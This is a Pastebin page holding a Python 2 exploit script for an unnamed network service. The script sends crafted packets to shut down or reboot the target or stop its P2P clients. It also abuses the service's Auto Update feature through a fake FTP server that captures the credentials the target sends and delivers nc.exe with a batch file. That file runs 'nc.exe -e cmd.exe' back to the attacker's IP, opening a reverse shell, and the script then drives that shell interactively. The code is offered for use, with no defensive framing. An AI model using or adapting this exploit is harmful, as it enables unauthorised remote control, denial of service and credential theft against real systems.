Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python2
- # -*- coding: utf-8 -*-
- import sys
- import struct
- import time
- import socket
- from threading import Thread
- #
- # Change this IP to your public IP address.
- #
- PUBLIC_IP = "192.168.0.1"
- #
- # Don't forget to open ports 21 and 8501 in your
- # OpenOffice.org firewall
- #
- SRV_PORT = 8500
- FTP_PORT = 21
- SHELL_PORT = 8501
- MAGIC = "\x15\x66\x00\x78"
- HALT = "\x65"
- REBOOT = "\x66"
- STOP = "\x70\x00\x00"
- UPDATE = "\x82"
- OK = "\x01"
- def usage (msg = None):
- if msg: print "Error: %s\n" % msg
- print "Usage: %s IP command" % sys.argv[0]
- print
- print "commands:"
- print "- halt shutdown the server"
- print "- reboot reboot the server"
- print "- stop stop P2P clients (eMule and Shareaza)"
- print "- pwn use a vulnerability in the Auto Update feature to
- get a remote shell"
- sys.exit(0)
- class fake_ftpd(Thread):
- def __init__ (self):
- Thread.__init__(self)
- self.s = None
- f = open('./nc.exe', 'rb')
- nc = f.read()
- f.close()
- batch = "@echo off\r\n"
- batch += "move cmd_execute_update_cmd_file.txt nc.exe\r\n"
- batch += "nc.exe %s %s -e cmd.exe\r\n" % (PUBLIC_IP, SHELL_PORT)
- self.files = {
- 'script/script_diff2/execute_update.bat': batch,
- 'script/script_diff2/cmd_execute_update_cmd_file.txt': nc
- }
- def run (self):
- self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
- self.s.bind(("", FTP_PORT))
- self.s.listen(1)
- self.s.listen(0x1337)
- print "[+] Waiting for FTP connection..."
- conn, addr = self.s.accept()
- print "[!] FTP - %s connected!" % addr[0]
- conn.send("220 Welcome to my FTPd - Ready to pwn you!\r\n")
- while True:
- data = conn.recv(1024)
- if not data:
- break
- args = data.rstrip().split(' ')
- if data.startswith('CWD'):
- conn.send('250 CWD command successful.\r\n')
- elif data.startswith('TYPE'):
- conn.send('200 TYPE set.\r\n')
- elif data.startswith('USER'):
- conn.send('331 Password required.\r\n')
- username = data.split(' ')[1].rstrip()
- elif data.startswith('PASS'):
- conn.send('230 User logged in.\r\n')
- password = data.split(' ')[1].rstrip()
- print "[!] TMG credentials: %s/%s" % (username, password)
- elif data.startswith('PORT'):
- arg = args[1].split(',')
- ip = '.'.join(arg[:4])
- port = int(arg[4]) * 256 + int(arg[5])
- sdata = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sdata.connect((ip, port))
- conn.send('200 PORT command successful.\r\n')
- elif data.startswith('RETR'):
- conn.send('150 Opening BINARY mode data connection\r\n')
- buf = self.files.get(args[1], 'file not found\r\n')
- sdata.send(buf)
- sdata.close()
- conn.send('226 Transfer complete\r\n')
- print "[+] File \"%s\" transfered..." % args[1]
- elif data.startswith('NLST'):
- conn.send('150 Here comes the directory listing.\r\n')
- if len(args) == 1:
- listing = ''
- else:
- listing = args[1]
- sdata.send(listing + '\r\n')
- sdata.close()
- conn.send('226 Directory send OK.\r\n')
- elif data.startswith('QUIT'):
- conn.send('221 Goodbye.\r\n')
- break
- else:
- conn.send('500 Unknown command.\r\n')
- conn.close()
- def do_stuff (host, cmd):
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(5)
- try:
- print "[+] Connecting to %s:%d..." % (host, SRV_PORT)
- s.connect((host, SRV_PORT))
- except Exception, e:
- print("[?] Error: %s" % e)
- s.close()
- return ;
- print "[+] Sending evil packet..."
- if cmd == 'halt':
- s.send(MAGIC + HALT)
- print "[!] Done!"
- elif cmd == 'reboot':
- s.send(MAGIC + REBOOT)
- print "[!] Done!"
- elif cmd == 'stop':
- s.send(MAGIC + STOP)
- data = s.recv(1)
- if data and data[0] == OK:
- print "[!] Done!"
- else:
- print "[!] Error :("
- elif cmd == 'pwn':
- ftpd = fake_ftpd()
- ftpd.daemon = True
- ftpd.start()
- command = socket.inet_aton(PUBLIC_IP) + struct.pack("h",
- socket.ntohs(FTP_PORT)) + "\x00\x00"
- s.send(MAGIC + UPDATE + command)
- data = s.recv(1)
- if data and data[0] == OK:
- s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s2.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
- s2.bind(("", SHELL_PORT))
- s2.listen(1)
- conn, addr = s2.accept()
- print "[!] SHELL - %s connected!" % addr[0]
- print conn.recv(4096)
- while True:
- cmd = raw_input()
- if cmd == "quit" or cmd == "exit":
- break;
- conn.send(cmd + "\r\n")
- data = ""
- conn.settimeout(None)
- data = conn.recv(1024)
- conn.settimeout(1)
- while True:
- line = ""
- try:
- line = conn.recv(1024)
- except socket.timeout:
- break
- if line == "":
- break
- data += line
- tab = data.split("\n")
- print "\n".join(tab[1:-1])
- conn.close()
- else:
- print "[!] Error :("
- s.close()
- if __name__ == '__main__':
- if len(sys.argv) < 3:
- usage("Not enough arguments")
- (_, host, cmd) = sys.argv
- if cmd not in ['halt', 'reboot', 'stop', 'pwn']:
- usage('Invalid command ("%s")' % cmd)
- do_stuff(host, cmd)
- sys.exit(0)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement